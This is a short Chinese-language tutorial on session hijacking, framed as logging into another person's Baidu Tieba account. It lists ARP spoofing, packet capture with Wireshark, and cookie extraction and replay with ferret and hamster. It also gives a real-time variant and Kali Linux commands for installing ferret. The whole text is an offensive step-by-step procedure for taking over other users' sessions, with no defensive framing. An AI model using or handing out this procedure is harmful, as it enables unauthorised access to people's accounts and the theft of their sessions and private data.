會話劫持-登陸別人的百度貼吧
1. arp欺騙
2. wireshark –抓包
抓到想要的數據包後保存,後綴爲pacp
3. ferret --重新生成抓包後的文件
然後使用 ferret –r 上面抓包保存的文件xx.pacp
成功後將生成一個新文件hamster.txt
4. hamster --重放流量
該軟件會要求修改代理及端口
訪問該地址及端口
5. 將hamster.txt 拷貝到root目錄下並在該目錄下運行hamster
第二種方法(實時同步):
提前設置好端口
1.arp欺騙
1.ferret -i eth0
2.hamster 選擇 adapters
ps:kali64 默認沒有 ferret 需要自行手動安裝 ,安裝步驟如下:
1.添加對32位的支持
dpkg --add-architecture i386
2.更新
apt-get clean && apt-get update&& apt-get upgrade -y && apt-get dist-upgrade -y
3.安裝ferret
sudo aptitude install ferret-sidejack:i386
